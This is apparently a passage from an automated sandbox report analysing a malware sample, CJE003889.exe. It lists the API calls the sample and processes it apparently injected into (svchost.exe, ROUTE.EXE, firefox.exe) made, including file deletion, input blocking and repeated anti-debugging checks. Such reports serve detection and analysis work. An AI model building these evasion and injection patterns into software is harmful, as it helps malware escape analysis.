                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CCEF95
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CCF0F2
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CCF3F3
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CC37EF
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CC3B12
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CCBCBC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0290CB20 FindFirstFileW,FindNextFileW,FindClose,6_2_0290CB20
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C649A0
                Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2437331299.0000027BD6B7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: mcPAaApkdo.exe, 00000007.00000002.3491154712.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417C33 LdrLoadDll,1_2_00417C33
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD3F09 BlockInput,0_2_00CD3F09
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C63B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C63B3A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C95A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C95A7C
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C64B37 LoadLibraryA,GetProcAddress,0_2_00C64B37
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_01015080 mov eax, dword ptr fs:[00000030h]0_2_01015080
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_01016690 mov eax, dword ptr fs:[00000030h]0_2_01016690
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_010166F0 mov eax, dword ptr fs:[00000030h]0_2_010166F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]1_2_03B663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]1_2_03BEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]1_2_03BB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]1_2_03C0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]1_2_03B2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]1_2_03B50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]1_2_03BD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov ecx, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]1_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]1_2_03BD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]1_2_03C062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]1_2_03B2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h]1_2_03C0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]1_2_03B2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]1_2_03B2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]1_2_03B36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]1_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]1_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]1_2_03C061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]1_2_03B70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]1_2_03B601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]1_2_03B60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]1_2_03BF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]1_2_03B2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]1_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]1_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]1_2_03B280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]1_2_03BC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]1_2_03B3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03B2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]1_2_03B720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03B2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]1_2_03B380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]1_2_03BB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]1_2_03BB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]1_2_03BC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]1_2_03B2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]1_2_03B2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]1_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]1_2_03BB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]1_2_03BD2000
